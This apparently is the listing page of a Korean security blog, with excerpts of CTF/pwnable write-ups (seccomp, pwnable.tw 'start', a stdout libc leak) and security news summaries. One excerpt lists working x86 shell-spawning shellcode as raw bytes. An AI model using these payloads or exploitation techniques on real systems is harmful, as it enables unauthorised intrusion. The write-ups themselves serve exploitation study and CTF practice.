목록분류 전체보기 (66)
ghkdtlwns987
main 함수를 보면 orw_seccomp 라는 함수가 있고, read() 함수로 값을 입력받는다. 보호기법으로는 NX-bit 가 비활성화 되어 있는 것으로 보아, 쉘 코드를 넣어주면 될 거 같다. 그렇다면 orw_seccomp() 함수가 뭔지 확인해보자. 여기서 적당히 prctl() 함수가 있다. prctl() 함수는 리눅스 내부에서 프로세스를 관리할때 사용하는 함수인데 sys/prctl.h 에 선언되어 있다. 이 함수에 대해 깊게 알 필요는 없고, seccomp filter 을 사용할 때 사용하는 함수이고, prctl 의 인자에 어떤 값이 들어가느냐에 따라 그 용도는 달라진다는 것만 알고 있으면 된다. 그렇다면 seccomp filter 에 대해 알아보자. seccomp filter 은 strict ..
pwnable.tw start 문제이다. 보호기법 모두 disabled 라 만만히 봤다. 그냥 ret 에 쉘 코드를 쓰려 했더니 뭔가 이상했다. gdb로 main 함수를 확인해 봤는데, main 함수가 없었다. 첫 문제부터 main 함수가 없어, 결국 ida 로 봤더니 다음과 같이 나왔다. start 와 exit 함수밖에 없었다. 다음은 start 함수이다. 어셈블리로 된 값을 보니, syscall 을 사용하는 거 같다. 그리고, main() 함수가 없는 것으로 보니, 아마 ARM architecture 을 사용하는 것으로 보인다. 정리하자면, 32bit Linux OS 를 사용하고, ARM 을 사용했으므로 x86 Arm syscall table 을 보면 syscall 3, 4 가 뭔지 알 수 있을 것이..
0x01. 가장 기본적으로 쉘을 띄우는 코드 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80 bytes : 25 미포함 : setreuid(), exit() 0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80 bytes : 31 미포함 : setreuid() 0x03. setreuid(geteuid(), getreuid()) 까지 포함..
이번엔 stdout 으로 libc 를 leak 하는 방법에 대해 알아보겠다. stdout 으로 leak 하기 위해선 stdout 구조체에 값을 입력할 수 있어야 한다. 1. stdout 이란? stdout 은 '표준 출력 스트림' 이다. printf 나, puts 등과 같은 함수를 사용할 시 stdout이 사용된다. 얘를 들어보자면 puts("ABCD") 와 같은 함수가 실행되면 내부적으로 write_sys 를 호출하여 출력이 되는데 , write_sys 는 'kernel buffer' 을 의미한다. 하지만 문자열을 출력할 때마다 커널버퍼를 사용하면 메모리 사용이 상당히 비효율적이다. 따라서 glibc 내부의 임시버퍼에 해당 문자열을 임시로 저장하는 방식을 이용하는데, _IO_2_1_stdout 는 _I..
보호되어 있는 글입니다.
7가지 모바일 브라우저에서 URL 속이는 취약점 발견됬는데, 모바일 사용자들은 작은 화면때문에, URL 주소를 잘 확인하지 않는다. 그렇기 때문에, 공격자 입장에서는 좀 더 편리하게 공격할 수 있는데, 공격자들이 이를 통해 주소창 정보를 조작할 수 있고, 모바일 사용자는 더 쉽게 속게 되는데, 현재 이 문제가 해결된 브라우저는 사파리와 오페라 뿐이다. 나머지 마이너 브라우저들은 위험에 노출되어 있다. 빠른 시일 내에 조치되어야 할 것으로 보인다. 이러한 취약점이 발견된 모바일 브라우저는 다음과 같다. 1) 사파리(Safari) 2) 오페라(Opera) 3) 얀덱스(Yandex) 4) UC웹(UCWeb)에서 개발한 브라우저인 UC브라우저(UC Browser) 5) 레이즈 IT 솔루션즈(Raise IT So..
이번에 어더비가 18개의 취약점을 공개했는데, 이 중 16개가 시스템을 작악당하는 심각한 취약점인걸로 알려졌다. 패치가 적용된 소프트웨어는 다음과 같다. 1) 어도비 일러스트레이터 2) 어도비 애니메이트(Adobe Animate) 3) 어도비 애프터이펙트(Adobe After Effects) 4) 어도비 포토샵(Adobe Photoshop), 5) 어도비 프리미어 프로(Adobe Premiere Pro) 6) 어도비 미디어 엔코더(Adobe Media Encoder) 7) 어도비 인디자인(Adobe InDesign) 8) 어도비 크리에이티브 클라우드 데스크톱 애플리케이션(Adobe Creative Cloud Desktop Application 이들은 다음과 같은 CVE 취약점이 붙었다. 1) CVE-20..
피파21 이라는 게임에 사람들의 관심이 쏠리면서 해커들도 자연스레 몰리게 되면서 피파21 을 하는 팬들의 주의가 필요할 것으로 보인다. 해커들은 주로 인게임 코인을 준다며 사람들을 속이고 있다. www.boannews.com/media/view.asp?idx=91839&kind=4&sub_kind=
애플이 버그바운티 상금 올리자마자 버그 마운티를 분석하는 사람들이 증가했는데, 벌서부터 애플 인프라에서 55개의 취약점을 찾아냄. 취약점의 종류는 다음과 같다. 1) 인증 우회 취약점을 통한 애플 교육자 프로그램 완전 침해 2) 인증 우회 취약점을 통한 DELMIA Apriso 애플리케이션 완전 침해 3) 워머블 XSS 취약점을 통한 아이클라우드 데이터 탈취 4) Author’s ePublisher에의 명령 주입 취약점 5) 아이클라우드의 SSRF 취약점을 통한 애플 소스코드 탈취 6) REST 오류 노출을 통한 Nova Admin 디버그 패널 접근 7) 팬텀JS 아이튠 배너 및 책 제목 XSS 취약점을 통한 AWS 비밀 키 접근 8) 애플 eSign의 힙 덤프 취약점을 통한 외부 직원 관리자 도구 침해..
리눅스 기반 장비들의 블루투스 요소에서 심각한 취약점 발견되는데, 익스플로잇 할 경우 피해자의 행동이 하나도 없어도 공격이 가능하게 된다. 이는 리눅스 5.10 이하의 버젼 모두 피해를 본다. (기사 원본)www.boannews.com/media/view.asp?idx=91808&kind=&sub_kind= 리눅스 블루투스 프로토콜에서 심각한 ‘블리딩투스’ 취약점 나와 구글과 인텔이 리눅스 블루투스 프로토콜인 블루지(BlueZ)에서 고위험군에 속하는 취약점을 발견했다. 블루지는 리눅스 기반 사물인터넷 장비들에 탑재된 블루투스 기능을 구현하는 데 있어 핵�� www.boannews.com 구글에서 시현한 거(아마 Heap 기법이라고 추정) github.com/google/security-research/s..